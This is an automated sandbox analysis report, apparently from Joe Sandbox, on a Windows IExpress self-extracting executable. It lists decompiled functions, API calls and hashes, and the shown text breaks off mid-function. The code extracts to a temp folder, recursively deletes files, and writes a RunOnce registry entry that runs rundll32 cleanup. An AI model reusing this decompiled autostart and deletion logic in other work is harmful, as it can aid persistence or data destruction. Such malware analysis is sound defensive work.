                                                                        control_flow_graph 406 f32f1d-f32f3d 407 f32f3f-f32f46 406->407 408 f32f6c-f32f73 call f35164 406->408 409 f32f48 call f351e5 407->409 410 f32f5f-f32f66 call f33a3f 407->410 415 f33041 408->415 416 f32f79-f32f80 call f355a0 408->416 417 f32f4d-f32f4f 409->417 410->408 410->415 420 f33043-f33053 call f36ce0 415->420 416->415 424 f32f86-f32fbe GetSystemDirectoryA call f3658a LoadLibraryA 416->424 417->415 421 f32f55-f32f5d 417->421 421->408 421->410 428 f32fc0-f32fd4 GetProcAddress 424->428 429 f32ff7-f33004 FreeLibrary 424->429 428->429 430 f32fd6-f32fee DecryptFileA 428->430 431 f33017-f33024 SetCurrentDirectoryA 429->431 432 f33006-f3300c 429->432 430->429 445 f32ff0-f32ff5 430->445 433 f33026-f3303c call f344b9 call f36285 431->433 434 f33054-f3305a 431->434 432->431 435 f3300e call f3621e 432->435 433->415 438 f33065-f3306c 434->438 439 f3305c call f33b26 434->439 443 f33013-f33015 435->443 441 f3306e-f33075 call f3256d 438->441 442 f3307c-f33089 438->442 451 f33061-f33063 439->451 452 f3307a 441->452 448 f330a1-f330a9 442->448 449 f3308b-f33091 442->449 443->415 443->431 445->429 455 f330b4-f330b7 448->455 456 f330ab-f330ad 448->456 449->448 453 f33093 call f33ba2 449->453 451->415 451->438 452->442 459 f33098-f3309a 453->459 455->420 456->455 458 f330af call f34169 456->458 458->455 459->415 461 f3309c 459->461 461->448
                                                                        C-Code - Quality: 82%
                                                                        			E00F32F1D(void* __ecx, int __edx) {
                                                                        				signed int _v8;
                                                                        				char _v272;
                                                                        				_Unknown_base(*)()* _v276;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t9;
                                                                        				void* _t11;
                                                                        				struct HWND__* _t12;
                                                                        				void* _t14;
                                                                        				int _t21;
                                                                        				signed int _t22;
                                                                        				signed int _t25;
                                                                        				intOrPtr* _t26;
                                                                        				signed int _t27;
                                                                        				void* _t30;
                                                                        				_Unknown_base(*)()* _t31;
                                                                        				void* _t34;
                                                                        				struct HINSTANCE__* _t36;
                                                                        				intOrPtr _t41;
                                                                        				intOrPtr* _t44;
                                                                        				signed int _t46;
                                                                        				int _t47;
                                                                        				void* _t58;
                                                                        				void* _t59;
                                                                        
                                                                        				_t43 = __edx;
                                                                        				_t9 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t9 ^ _t46;
                                                                        				if( *0xf38a38 != 0) {
                                                                        					L5:
                                                                        					_t11 = E00F35164(_t52);
                                                                        					_t53 = _t11;
                                                                        					if(_t11 == 0) {
                                                                        						L16:
                                                                        						_t12 = 0;
                                                                        						L17:
                                                                        						return E00F36CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                        					}
                                                                        					_t14 = E00F355A0(_t53); // executed
                                                                        					if(_t14 == 0) {
                                                                        						goto L16;
                                                                        					} else {
                                                                        						_t45 = 0x105;
                                                                        						GetSystemDirectoryA( &_v272, 0x105);
                                                                        						_t43 = 0x105;
                                                                        						_t40 =  &_v272;
                                                                        						E00F3658A( &_v272, 0x105, "advapi32.dll");
                                                                        						_t36 = LoadLibraryA( &_v272);
                                                                        						_t44 = 0;
                                                                        						if(_t36 != 0) {
                                                                        							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                        							_v276 = _t31;
                                                                        							if(_t31 != 0) {
                                                                        								_t45 = _t47;
                                                                        								_t40 = _t31;
                                                                        								 *0xf3a288("C:\Users\FRONTD~1\AppData\Local\Temp\IXP001.TMP\", 0); // executed
                                                                        								_v276();
                                                                        								if(_t47 != _t47) {
                                                                        									_t40 = 4;
                                                                        									asm("int 0x29");
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						FreeLibrary(_t36);
                                                                        						_t58 =  *0xf38a24 - _t44; // 0x0
                                                                        						if(_t58 != 0) {
                                                                        							L14:
                                                                        							_t21 = SetCurrentDirectoryA("C:\Users\FRONTD~1\AppData\Local\Temp\IXP001.TMP\"); // executed
                                                                        							if(_t21 != 0) {
                                                                        								__eflags =  *0xf38a2c - _t44; // 0x0
                                                                        								if(__eflags != 0) {
                                                                        									L20:
                                                                        									__eflags =  *0xf38d48 & 0x000000c0;
                                                                        									if(( *0xf38d48 & 0x000000c0) == 0) {
                                                                        										_t41 =  *0xf39a40; // 0x3, executed
                                                                        										_t26 = E00F3256D(_t41); // executed
                                                                        										_t44 = _t26;
                                                                        									}
                                                                        									_t22 =  *0xf38a24; // 0x0
                                                                        									 *0xf39a44 = _t44;
                                                                        									__eflags = _t22;
                                                                        									if(_t22 != 0) {
                                                                        										L26:
                                                                        										__eflags =  *0xf38a38;
                                                                        										if( *0xf38a38 == 0) {
                                                                        											__eflags = _t22;
                                                                        											if(__eflags == 0) {
                                                                        												E00F34169(__eflags);
                                                                        											}
                                                                        										}
                                                                        										_t12 = 1;
                                                                        										goto L17;
                                                                        									} else {
                                                                        										__eflags =  *0xf39a30 - _t22; // 0x0
                                                                        										if(__eflags != 0) {
                                                                        											goto L26;
                                                                        										}
                                                                        										_t25 = E00F33BA2(); // executed
                                                                        										__eflags = _t25;
                                                                        										if(_t25 == 0) {
                                                                        											goto L16;
                                                                        										}
                                                                        										_t22 =  *0xf38a24; // 0x0
                                                                        										goto L26;
                                                                        									}
                                                                        								}
                                                                        								_t27 = E00F33B26(_t40, _t44);
                                                                        								__eflags = _t27;
                                                                        								if(_t27 == 0) {
                                                                        									goto L16;
                                                                        								}
                                                                        								goto L20;
                                                                        							}
                                                                        							_t43 = 0x4bc;
                                                                        							E00F344B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                        							 *0xf39124 = E00F36285();
                                                                        							goto L16;
                                                                        						}
                                                                        						_t59 =  *0xf39a30 - _t44; // 0x0
                                                                        						if(_t59 != 0) {
                                                                        							goto L14;
                                                                        						}
                                                                        						_t30 = E00F3621E(); // executed
                                                                        						if(_t30 == 0) {
                                                                        							goto L16;
                                                                        						}
                                                                        						goto L14;
                                                                        					}
                                                                        				}
                                                                        				_t49 =  *0xf38a24;
                                                                        				if( *0xf38a24 != 0) {
                                                                        					L4:
                                                                        					_t34 = E00F33A3F(_t51);
                                                                        					_t52 = _t34;
                                                                        					if(_t34 == 0) {
                                                                        						goto L16;
                                                                        					}
                                                                        					goto L5;
                                                                        				}
                                                                        				if(E00F351E5(_t49) == 0) {
                                                                        					goto L16;
                                                                        				}
                                                                        				_t51 =  *0xf38a38;
                                                                        				if( *0xf38a38 != 0) {
                                                                        					goto L5;
                                                                        				}
                                                                        				goto L4;
                                                                        			}

                                                                        APIs
                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00F32F93
                                                                        • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00F32FB2
                                                                        • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00F32FC6
                                                                        • DecryptFileA.ADVAPI32 ref: 00F32FE6
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00F32FF8
                                                                        • SetCurrentDirectoryA.KERNELBASE(C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\), ref: 00F3301C
                                                                          • Part of subcall function 00F351E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00F32F4D,?,00000002,00000000), ref: 00F35201
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\$DecryptFileA$advapi32.dll
                                                                        • API String ID: 2126469477-1230860006
                                                                        • Opcode ID: 7654d87dc972e9e82381b397ed4121d36e7014945ca24ff4284b208cecea7fba
                                                                        • Instruction ID: 8566ff4632eac67fdf24746bc968ba4cee672b886af7712ea87ad8c621b60e00
                                                                        • Opcode Fuzzy Hash: 7654d87dc972e9e82381b397ed4121d36e7014945ca24ff4284b208cecea7fba
                                                                        • Instruction Fuzzy Hash: C7419671E003099ADF38EB72DC4565A73AAAB547B4F010165F941D2191EFBCCF81FA61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        C-Code - Quality: 86%
                                                                        			E00F32390(CHAR* __ecx) {
                                                                        				signed int _v8;
                                                                        				char _v276;
                                                                        				char _v280;
                                                                        				char _v284;
                                                                        				struct _WIN32_FIND_DATAA _v596;
                                                                        				struct _WIN32_FIND_DATAA _v604;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t21;
                                                                        				int _t36;
                                                                        				void* _t46;
                                                                        				void* _t62;
                                                                        				void* _t63;
                                                                        				CHAR* _t65;
                                                                        				void* _t66;
                                                                        				signed int _t67;
                                                                        				signed int _t69;
                                                                        
                                                                        				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                        				_t21 =  *0xf38004; // 0xc69e30f7
                                                                        				_t22 = _t21 ^ _t69;
                                                                        				_v8 = _t21 ^ _t69;
                                                                        				_t65 = __ecx;
                                                                        				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                        					L10:
                                                                        					_pop(_t62);
                                                                        					_pop(_t66);
                                                                        					_pop(_t46);
                                                                        					return E00F36CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                        				} else {
                                                                        					E00F31680( &_v276, 0x104, __ecx);
                                                                        					_t58 = 0x104;
                                                                        					E00F316B3( &_v280, 0x104, "*");
                                                                        					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                        					_t63 = _t22;
                                                                        					if(_t63 == 0xffffffff) {
                                                                        						goto L10;
                                                                        					} else {
                                                                        						goto L3;
                                                                        					}
                                                                        					do {
                                                                        						L3:
                                                                        						_t58 = 0x104;
                                                                        						E00F31680( &_v276, 0x104, _t65);
                                                                        						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                        							_t58 = 0x104;
                                                                        							E00F316B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                        							SetFileAttributesA( &_v280, 0x80);
                                                                        							DeleteFileA( &_v280);
                                                                        						} else {
                                                                        							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                        								E00F316B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                        								_t58 = 0x104;
                                                                        								E00F3658A( &_v280, 0x104, 0xf31140);
                                                                        								E00F32390( &_v284);
                                                                        							}
                                                                        						}
                                                                        						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                        					} while (_t36 != 0);
                                                                        					FindClose(_t63); // executed
                                                                        					_t22 = RemoveDirectoryA(_t65); // executed
                                                                        					goto L10;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • FindFirstFileA.KERNELBASE(?,00F38A3A,00F311F4,00F38A3A,00000000,?,?), ref: 00F323F6
                                                                        • lstrcmpA.KERNEL32(?,00F311F8), ref: 00F32427
                                                                        • lstrcmpA.KERNEL32(?,00F311FC), ref: 00F3243B
                                                                        • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00F32495
                                                                        • DeleteFileA.KERNEL32(?), ref: 00F324A3
                                                                        • FindNextFileA.KERNELBASE(00000000,00000010), ref: 00F324AF
                                                                        • FindClose.KERNELBASE(00000000), ref: 00F324BE
                                                                        • RemoveDirectoryA.KERNELBASE(00F38A3A), ref: 00F324C5
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                        • String ID:
                                                                        • API String ID: 836429354-0
                                                                        • Opcode ID: 1db0fc4e622f3b9a0d8ef2df5df2030461dd59d7bf8c0763150201d238e65486
                                                                        • Instruction ID: bcbe3d646cc6b3d69582e6798abe3e907d5e8f5a5dd57cf7606e5d27e561ecc9
                                                                        • Opcode Fuzzy Hash: 1db0fc4e622f3b9a0d8ef2df5df2030461dd59d7bf8c0763150201d238e65486
                                                                        • Instruction Fuzzy Hash: F1319572604744ABC320EBA4CC89AEB73EDBFC4335F04492DB59586291EB78D90DE752
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 70%
                                                                        			E00F32BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				long _t4;
                                                                        				void* _t6;
                                                                        				intOrPtr _t7;
                                                                        				void* _t9;
                                                                        				struct HINSTANCE__* _t12;
                                                                        				intOrPtr* _t17;
                                                                        				signed char _t19;
                                                                        				intOrPtr* _t21;
                                                                        				void* _t22;
                                                                        				void* _t24;
                                                                        				intOrPtr _t32;
                                                                        
                                                                        				_t4 = GetVersion();
                                                                        				if(_t4 >= 0 && _t4 >= 6) {
                                                                        					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                        					if(_t12 != 0) {
                                                                        						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                        						if(_t21 != 0) {
                                                                        							_t17 = _t21;
                                                                        							 *0xf3a288(0, 1, 0, 0);
                                                                        							 *_t21();
                                                                        							_t29 = _t24 - _t24;
                                                                        							if(_t24 != _t24) {
                                                                        								_t17 = 4;
                                                                        								asm("int 0x29");
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				_t20 = _a12;
                                                                        				_t18 = _a4;
                                                                        				 *0xf39124 = 0;
                                                                        				if(E00F32CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                        					_t9 = E00F32F1D(_t18, _t20); // executed
                                                                        					_t22 = _t9; // executed
                                                                        					E00F352B6(0, _t18, _t21, _t22); // executed
                                                                        					if(_t22 != 0) {
                                                                        						_t32 =  *0xf38a3a; // 0x0
                                                                        						if(_t32 == 0) {
                                                                        							_t19 =  *0xf39a2c; // 0x0
                                                                        							if((_t19 & 0x00000001) != 0) {
                                                                        								E00F31F90(_t19, _t21, _t22);
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				_t6 =  *0xf38588; // 0x0
                                                                        				if(_t6 != 0) {
                                                                        					CloseHandle(_t6);
                                                                        				}
                                                                        				_t7 =  *0xf39124; // 0x0
                                                                        				return _t7;
                                                                        			}



















                                                                        APIs
                                                                        • GetVersion.KERNEL32(?,00000002,00000000,?,00F36BB0,00F30000,00000000,00000002,0000000A), ref: 00F32C03
                                                                        • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00F36BB0,00F30000,00000000,00000002,0000000A), ref: 00F32C18
                                                                        • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00F32C28
                                                                        • CloseHandle.KERNEL32(00000000,?,?,00F36BB0,00F30000,00000000,00000002,0000000A), ref: 00F32C98
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Handle$AddressCloseModuleProcVersion
                                                                        • String ID: HeapSetInformation$Kernel32.dll
                                                                        • API String ID: 62482547-3460614246
                                                                        • Opcode ID: 19c3378f22f787eeab0b53b9ec5d5d68847efd3a39179f60347ff1b33f9f2e72
                                                                        • Instruction ID: 724c2df33bfc7905e2df47a82dbea46afb4cdb3b97471573ea5ac1131915ef18
                                                                        • Opcode Fuzzy Hash: 19c3378f22f787eeab0b53b9ec5d5d68847efd3a39179f60347ff1b33f9f2e72
                                                                        • Instruction Fuzzy Hash: 6711E571A00309ABDB607BB6AC88A6F375AAB847F0F141015F980E3290DA75DC01B6A2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F36F40() {
                                                                        
                                                                        				SetUnhandledExceptionFilter(E00F36EF0); // executed
                                                                        				return 0;
                                                                        			}



                                                                        0x00f36f45
                                                                        0x00f36f4d

                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00F36F45
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled
                                                                        • String ID:
                                                                        • API String ID: 3192549508-0
                                                                        • Opcode ID: 8c281552e03e18a620c03b44833a1e83e8f776d25a598ba0f8af5c849c226d3a
                                                                        • Instruction ID: f7074f9b853668480f4e9000df7ddf982b9ad0ab9f3fb230a17b0718311d7d32
                                                                        • Opcode Fuzzy Hash: 8c281552e03e18a620c03b44833a1e83e8f776d25a598ba0f8af5c849c226d3a
                                                                        • Instruction Fuzzy Hash: 7B9002642511045796102B719D1D41976925B4D623F829460A051C8495DB6180847917
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        C-Code - Quality: 93%
                                                                        			E00F3202A(struct HINSTANCE__* __edx) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				char _v528;
                                                                        				void* _v532;
                                                                        				int _v536;
                                                                        				int _v540;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t28;
                                                                        				long _t36;
                                                                        				long _t41;
                                                                        				struct HINSTANCE__* _t46;
                                                                        				intOrPtr _t49;
                                                                        				intOrPtr _t50;
                                                                        				CHAR* _t54;
                                                                        				void _t56;
                                                                        				signed int _t66;
                                                                        				intOrPtr* _t72;
                                                                        				void* _t73;
                                                                        				void* _t75;
                                                                        				void* _t80;
                                                                        				intOrPtr* _t81;
                                                                        				void* _t86;
                                                                        				void* _t87;
                                                                        				void* _t90;
                                                                        				_Unknown_base(*)()* _t91;
                                                                        				signed int _t93;
                                                                        				void* _t94;
                                                                        				void* _t95;
                                                                        
                                                                        				_t79 = __edx;
                                                                        				_t28 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t28 ^ _t93;
                                                                        				_t84 = 0x104;
                                                                        				memset( &_v268, 0, 0x104);
                                                                        				memset( &_v528, 0, 0x104);
                                                                        				_t95 = _t94 + 0x18;
                                                                        				_t66 = 0;
                                                                        				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                        				if(_t36 != 0) {
                                                                        					L24:
                                                                        					return E00F36CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                        				}
                                                                        				_push(_t86);
                                                                        				_t87 = 0;
                                                                        				while(1) {
                                                                        					E00F3171E("wextract_cleanup1", 0x50, "wextract_cleanup%d", _t87);
                                                                        					_t95 = _t95 + 0x10;
                                                                        					_t41 = RegQueryValueExA(_v532, "wextract_cleanup1", 0, 0, 0,  &_v540); // executed
                                                                        					if(_t41 != 0) {
                                                                        						break;
                                                                        					}
                                                                        					_t87 = _t87 + 1;
                                                                        					if(_t87 < 0xc8) {
                                                                        						continue;
                                                                        					}
                                                                        					break;
                                                                        				}
                                                                        				if(_t87 != 0xc8) {
                                                                        					GetSystemDirectoryA( &_v528, _t84);
                                                                        					_t79 = _t84;
                                                                        					E00F3658A( &_v528, _t84, "advpack.dll");
                                                                        					_t46 = LoadLibraryA( &_v528); // executed
                                                                        					_t84 = _t46;
                                                                        					if(_t84 == 0) {
                                                                        						L10:
                                                                        						if(GetModuleFileNameA( *0xf39a3c,  &_v268, 0x104) == 0) {
                                                                        							L17:
                                                                        							_t36 = RegCloseKey(_v532);
                                                                        							L23:
                                                                        							_pop(_t86);
                                                                        							goto L24;
                                                                        						}
                                                                        						L11:
                                                                        						_t72 =  &_v268;
                                                                        						_t80 = _t72 + 1;
                                                                        						do {
                                                                        							_t49 =  *_t72;
                                                                        							_t72 = _t72 + 1;
                                                                        						} while (_t49 != 0);
                                                                        						_t73 = _t72 - _t80;
                                                                        						_t81 = 0xf391e4;
                                                                        						do {
                                                                        							_t50 =  *_t81;
                                                                        							_t81 = _t81 + 1;
                                                                        						} while (_t50 != 0);
                                                                        						_t84 = _t73 + 0x50 + _t81 - 0xf391e5;
                                                                        						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xf391e5);
                                                                        						if(_t90 != 0) {
                                                                        							 *0xf38580 = _t66 ^ 0x00000001;
                                                                        							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                        							if(_t66 == 0) {
                                                                        								_t54 = "%s /D:%s";
                                                                        							}
                                                                        							_push("C:\Users\FRONTD~1\AppData\Local\Temp\IXP001.TMP\");
                                                                        							E00F3171E(_t90, _t84, _t54,  &_v268);
                                                                        							_t75 = _t90;
                                                                        							_t23 = _t75 + 1; // 0x1
                                                                        							_t79 = _t23;
                                                                        							do {
                                                                        								_t56 =  *_t75;
                                                                        								_t75 = _t75 + 1;
                                                                        							} while (_t56 != 0);
                                                                        							_t24 = _t75 - _t79 + 1; // 0x2
                                                                        							RegSetValueExA(_v532, "wextract_cleanup1", 0, 1, _t90, _t24); // executed
                                                                        							RegCloseKey(_v532); // executed
                                                                        							_t36 = LocalFree(_t90);
                                                                        							goto L23;
                                                                        						}
                                                                        						_t79 = 0x4b5;
                                                                        						E00F344B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                        						goto L17;
                                                                        					}
                                                                        					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                        					_t66 = 0 | _t91 != 0x00000000;
                                                                        					FreeLibrary(_t84); // executed
                                                                        					if(_t91 == 0) {
                                                                        						goto L10;
                                                                        					}
                                                                        					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                        						E00F3658A( &_v268, 0x104, 0xf31140);
                                                                        					}
                                                                        					goto L11;
                                                                        				}
                                                                        				_t36 = RegCloseKey(_v532);
                                                                        				 *0xf38530 = _t66;
                                                                        				goto L23;
                                                                        			}

































                                                                        0x00000000
                                                                        0x00f32250
                                                                        0x00f321d2
                                                                        0x00f321d9
                                                                        0x00000000
                                                                        0x00f321d9
                                                                        0x00f3213a
                                                                        0x00f32141
                                                                        0x00f32144
                                                                        0x00f3214c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f32163
                                                                        0x00f32172
                                                                        0x00f32172
                                                                        0x00000000
                                                                        0x00f32163
                                                                        0x00f320ea
                                                                        0x00f320f0
                                                                        0x00000000

                                                                        APIs
                                                                        • memset.MSVCRT ref: 00F32050
                                                                        • memset.MSVCRT ref: 00F3205F
                                                                        • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 00F3208C
                                                                          • Part of subcall function 00F3171E: _vsnprintf.MSVCRT ref: 00F31750
                                                                        • RegQueryValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F320C9
                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F320EA
                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00F32103
                                                                        • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F32122
                                                                        • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00F32134
                                                                        • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F32144
                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00F3215B
                                                                        • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F3218C
                                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F321C1
                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F321E4
                                                                        • RegSetValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 00F3223D
                                                                        • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F32249
                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F32250
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                        • String ID: %s /D:%s$C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup1
                                                                        • API String ID: 178549006-1563176777
                                                                        • Opcode ID: 9c5ff04eefb4cc84beae249780d35f78c398a79e5b36d45e530a99b367f29860
                                                                        • Instruction ID: 92ad2031a752d9fcf9a997c2da060b5ec59ea0013302c88a254849d100ead1d1
                                                                        • Opcode Fuzzy Hash: 9c5ff04eefb4cc84beae249780d35f78c398a79e5b36d45e530a99b367f29860
                                                                        • Instruction Fuzzy Hash: A55139B2A00218ABDB64AF20DC49FFB773DEF40770F0441A4F985E3151DAB5DE49AA60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        [Control-flow graph of function 00F355A0; legend: Executed / Not Executed]
                                                                        C-Code - Quality: 92%
                                                                        			E00F355A0(void* __eflags) {
                                                                        				signed int _v8;
                                                                        				char _v265;
                                                                        				char _v268;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t28;
                                                                        				int _t32;
                                                                        				int _t33;
                                                                        				int _t35;
                                                                        				signed int _t36;
                                                                        				signed int _t38;
                                                                        				int _t40;
                                                                        				int _t44;
                                                                        				long _t48;
                                                                        				int _t49;
                                                                        				int _t50;
                                                                        				signed int _t53;
                                                                        				int _t54;
                                                                        				int _t59;
                                                                        				char _t60;
                                                                        				int _t65;
                                                                        				char _t66;
                                                                        				int _t67;
                                                                        				int _t68;
                                                                        				int _t69;
                                                                        				int _t70;
                                                                        				int _t71;
                                                                        				struct _SECURITY_ATTRIBUTES* _t72;
                                                                        				int _t73;
                                                                        				CHAR* _t82;
                                                                        				CHAR* _t88;
                                                                        				void* _t103;
                                                                        				signed int _t110;
                                                                        
                                                                        				_t28 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t28 ^ _t110;
